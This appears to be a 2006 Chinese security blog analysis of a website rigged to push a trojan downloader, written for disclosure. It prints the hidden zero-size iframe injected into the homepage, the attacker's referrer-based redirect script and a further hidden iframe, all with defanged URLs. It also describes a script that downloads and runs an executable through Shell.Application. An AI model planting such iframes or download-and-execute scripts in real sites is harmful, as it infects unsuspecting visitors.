一个下载木马的网站

endurer　原创
2006-08-21　第1版

网站首页插入如下代码：
/------------
＜iframe src="hxxp://www.ac***66.cn/8***8/index.htm" width="0" height="0" frameborder="0"＞＜/iframe＞
------------/

hxxp://www.ac***66.cn/8***8/index.htm 的内容为：
/--------
＜SCRIPT language="JavaScript"＞
function cameFrom(where) {
   if (!document.referrer && !where) return true;
   else return (document.referrer.indexOf(where)＞=0)
   }

if (cameFrom("nen.com.cn")) {
   location.replace("3721.htm");
   }

else if (cameFrom("gov")) {
  location.replace("3721.htm");
   }

else if (cameFrom("or")) {
   location.replace("3721.htm");
   }

else if (cameFrom("bi")) {
   location.replace("3721.htm");
   }

else if (cameFrom("1488.com")) {
   location.replace("3721.htm");
   }

else {
   location.replace("mm.htm");
   }
＜/SCRIPT＞
--------/

hxxp://www.ac***66.cn/8***8/mm.htm 的内容为：
/--------
＜iframe src="hxxp://www.ac***66.cn/8***8/joke.htm" width="0" height="0" frameborder="0"＞＜/iframe＞

＜script src='hxxp://s**59.cnzz.com/stat.php?id=230393&web_id=230393&show=pic' language='JavaScript' charset='gb2312'＞＜/script＞
--------/

hxxp://www.ac***66.cn/8***8/joke.htm 的内容为JavaScript脚本，由于其中包含了攻击者所属组织和QQ号，所里不公开具体内容。

该脚本利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://www.ac***66.cn/8***8/rpp.exe， 保存为 IE临时文件夹中的 g0ld.com，并利用Shell.Application 对象 的 ShellExecute 方法 来运行。（这与 小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的维金/Viking蠕虫  中第二段脚本程序相似）

g0ld.com               Kaspersky 报为 Trojan-Downloader.Win32.Delf.asb，瑞星报为 Trojan.DL.Delf.csh